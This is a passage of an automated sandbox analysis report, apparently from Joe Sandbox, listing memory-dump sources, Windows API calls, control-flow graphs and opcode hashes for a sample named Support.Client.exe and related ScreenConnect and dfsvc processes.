• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Support.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Support.Client.exe,00000104), ref: 00C02F93
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0305E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C03068
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Support.Client.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-2197628833
                                                                                                                                                                                                                                                  • Opcode ID: 398804efb6670a7826d3f04bd8e47aec4ed8dfee3019393feef5d531cb022dd3
                                                                                                                                                                                                                                                  • Instruction ID: e4393e7c9d13f53c42972e0fc5469b94030d04ae5d844bfa09757fbcdc62f4dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 398804efb6670a7826d3f04bd8e47aec4ed8dfee3019393feef5d531cb022dd3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31A2B1A00254AFCB21DF9ADC85A9EBBFCEF85714F144066F90497291D6708F40DB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C02594,00000000,?,00C11B50,?,?,?,00C02737,00000004,InitializeCriticalSectionEx,00C0BC48,InitializeCriticalSectionEx), ref: 00C025F0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00C02594,00000000,?,00C11B50,?,?,?,00C02737,00000004,InitializeCriticalSectionEx,00C0BC48,InitializeCriticalSectionEx,00000000,?,00C024C7), ref: 00C025FA
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C02622
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: ea5728d6694f67645b2611956963453e62e297765dc512203397deca44ca80e3
                                                                                                                                                                                                                                                  • Instruction ID: ea9761c27f659fc03907b5a6153ea9e2ccc247c4f5fe409a5e5331c312ae6907
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea5728d6694f67645b2611956963453e62e297765dc512203397deca44ca80e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE04870680304BBEF115B60EC0AF5E3F54EB10B55F114421FA1DE40E1E7A2DE54D544
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue), ref: 00C0580F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue,00C0C4D8,FlsSetValue,00000000,00000364,?,00C044F6), ref: 00C0581B
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C05784,00000000,00000000,00000000,00000000,?,00C05981,00000006,FlsSetValue,00C0C4D8,FlsSetValue,00000000), ref: 00C05829
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                  • Opcode ID: 6147b7c8a0eef3526404f94980f3ae76742dada194140e76f23e656a490bd091
                                                                                                                                                                                                                                                  • Instruction ID: a9865520a65089e2f2e8f21b6cd1736b9e3bba98f46ca803afa7426a4921404e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6147b7c8a0eef3526404f94980f3ae76742dada194140e76f23e656a490bd091
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A301AC36655622ABC7218B69AC44B5B7798AF057A57118724FD26D71C0D720DD00CEE0

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:116
                                                                                                                                                                                                                                                  Total number of Limit Nodes:11

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P$x]<P
                                                                                                                                                                                                                                                  • API String ID: 0-1534737675
                                                                                                                                                                                                                                                  • Opcode ID: bb8842ca23b44b9ec8193c7dce4d9fccdff621c3311e502ea96cad1af79c5b54
                                                                                                                                                                                                                                                  • Instruction ID: 3f372b06c1d7de1be879c2ff3474bbd669a78ecb3f82d6adeb67550b7118808b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb8842ca23b44b9ec8193c7dce4d9fccdff621c3311e502ea96cad1af79c5b54
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5B16D21A0EEC90FD755D7BC48696B83FD1EF9A310B0841BFD099C71E7DE28A9068341
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookieInternet
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 930238652-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543467810.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b76d000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:12.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                                  execution_graph 12033 7ffd9b8884b8 12034 7ffd9b8884f6 SetProcessMitigationPolicy 12033->12034 12035 7ffd9b888552 12034->12035 12029 7ffd9b884890 12030 7ffd9b884899 GetTokenInformation 12029->12030 12032 7ffd9b89f2d7 12030->12032 12021 7ffd9b88f67b 12022 7ffd9b88f687 CreateFileW 12021->12022 12024 7ffd9b88f7bc 12022->12024 12025 7ffd9b883dfa 12026 7ffd9b89f470 CloseHandle 12025->12026 12028 7ffd9b89f4eb 12026->12028

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 192 7ffd9b884890-7ffd9b8848d9 198 7ffd9b8848dc 192->198 198->198 199 7ffd9b8848de-7ffd9b884949 198->199 207 7ffd9b88494c 199->207 207->207 208 7ffd9b88494e-7ffd9b89f2d5 GetTokenInformation 207->208 214 7ffd9b89f2d7 208->214 215 7ffd9b89f2dd-7ffd9b89f30e 208->215 214->215
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4114910276-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 217 7ffd9b88f67b-7ffd9b88f710 222 7ffd9b88f71a-7ffd9b88f7ba CreateFileW 217->222 223 7ffd9b88f712-7ffd9b88f717 217->223 225 7ffd9b88f7bc 222->225 226 7ffd9b88f7c2-7ffd9b88f7f5 222->226 223->222 225->226
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 823142352-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 228 7ffd9b883eaa-7ffd9b8884ef 230 7ffd9b8884f6-7ffd9b888550 SetProcessMitigationPolicy 228->230 231 7ffd9b888558-7ffd9b888587 230->231 232 7ffd9b888552 230->232 232->231
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 234 7ffd9b8884b8-7ffd9b888550 SetProcessMitigationPolicy 236 7ffd9b888558-7ffd9b888587 234->236 237 7ffd9b888552 234->237 237->236
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 337 7ffd9b883dfa-7ffd9b89f4e9 CloseHandle 340 7ffd9b89f4eb 337->340 341 7ffd9b89f4f1-7ffd9b89f51f 337->341 340->341
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: $kq$$kq
• API String ID: 0-3550614674
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-76226702
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (oq
• API String ID: 0-3175707579
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: LRkq
• API String ID: 0-1052062081
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (oq
• API String ID: 0-3175707579
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: ['
• API String ID: 0-410297704
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: $kq
• API String ID: 0-3037731980
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: P\
• API String ID: 0-198795799
                                                                                                                                                                                                                                                  • Opcode ID: 9af1eea606210cd0d9514201305e321a0ff53dfb71ebe51502a7ed37bd621346
                                                                                                                                                                                                                                                  • Instruction ID: dbb8dc2456a0b5bbdfe6551573da255238ad655d139b11faff571e5eb6f4f04c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9af1eea606210cd0d9514201305e321a0ff53dfb71ebe51502a7ed37bd621346
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC21FD71B802055BC701EB78E851A6EBFE2EFC5620F148829E415AB358DB30AD09C7E1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P\
                                                                                                                                                                                                                                                  • API String ID: 0-198795799
                                                                                                                                                                                                                                                  • Opcode ID: 130adfadfc6a9a7bb78823bde236be0405c473fcc1dbd8d41a1ea344e25fab33
                                                                                                                                                                                                                                                  • Instruction ID: 3c1787c5f0a804c86f5c0ba83fc5cd97c51e63463faf16e3f85630b67392188d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 130adfadfc6a9a7bb78823bde236be0405c473fcc1dbd8d41a1ea344e25fab33
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B711D070B802055BC700EB68D841A6EBBE3EFC4620F108928E5099B358DF70AE09C7D1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 75b8174a397256009600212b305858f347f0cb99a7c089e2b387bb627cb855bd
                                                                                                                                                                                                                                                  • Instruction ID: e4ea75868715c995ff40cbf4d618382df4f992304de74cd98e35132ce9fdeb47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75b8174a397256009600212b305858f347f0cb99a7c089e2b387bb627cb855bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18610330D053498FC706DF78D854BEDBFB1EF8A300F55859AD040AB2A5EB74A889CB61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ff9c1debaa62383ea25ef4c74e95ea8bb520faaf0e82d0154d2902846e703892
                                                                                                                                                                                                                                                  • Instruction ID: 5dc9344e83b35e94d0ac509522baeafc2ce404179b735326ddeac2fb5fff8e60
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff9c1debaa62383ea25ef4c74e95ea8bb520faaf0e82d0154d2902846e703892
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8251C130E503099FCB05DFB9D844B9DBBB2FF98310F509669E504AB398DB74A885CB50
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 74f54824dcb020c200b20937f59c249d63c9eb2772bc1f9a618f2702418e92e0
                                                                                                                                                                                                                                                  • Instruction ID: 89d7dec84859dba0010a54e18ef48cb97673830f89bf28c57e577c24970be7c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f54824dcb020c200b20937f59c249d63c9eb2772bc1f9a618f2702418e92e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C512C34600A01CFD768CF29D484966B7F2FF8D724B144A5CE8969B7A4EB31E845CB54
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3f4f38df49dad4f36c2f0c3ec92f2a313399b6979ef45713b8a450dfc25d7e0e
                                                                                                                                                                                                                                                  • Instruction ID: 6d9ba572ecc36fe755fea539120f16e51fbc1a8a741256d86fc31aece85c6e34
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f4f38df49dad4f36c2f0c3ec92f2a313399b6979ef45713b8a450dfc25d7e0e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE413974B007098FCB74DF29D948A6ABBF1FF48754B108A28D856D77A5DB30E845CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ca60c28c7bab9efdec08f0e67ab483b8de05656847b031021c073f8fcc1fbaf7
                                                                                                                                                                                                                                                  • Instruction ID: 32c18c1c6a87d190d8c69416253eeeef72e049455d21693c0b1f4e60de51f63b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca60c28c7bab9efdec08f0e67ab483b8de05656847b031021c073f8fcc1fbaf7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C415A74A00705CFCB74CF29D888AAABBF1FF44764B104A28D856D77A5DB30E845CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 105d3656cb7bec273658782527ff0b8d5a4ebde562784ab70c186251b14d8365
                                                                                                                                                                                                                                                  • Instruction ID: 25522230a6e1a336ba8a4b28cb1914568880b4c8e3e68528c61e7e261cbe06cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 105d3656cb7bec273658782527ff0b8d5a4ebde562784ab70c186251b14d8365
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D316F32B001068BDB149F69C458AAFFBF5EF89798F14846AE909E7754DB31DC018B90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5cd6b67b12401327aa6af7b57f332eb46f0474ed1407f301f9a1af737a57428f
                                                                                                                                                                                                                                                  • Instruction ID: 9e6e947d7917220d3741acd4c056e0b6351d22b5e1079c21944513620ed96b0b
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b1740346ea33aa661e6d593811e1846b7faa13d2d50372903795815af226a1ec
                                                                                                                                                                                                                                                  • Instruction ID: 31ee94e891fe4239f3868697429c328732df4b28cee9eb1b51742f24d1c23335
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1740346ea33aa661e6d593811e1846b7faa13d2d50372903795815af226a1ec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801263220D3408FC3A4CF39A400686BFE1EF9A700F0588AFE4C5C7280DA31A889C751
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
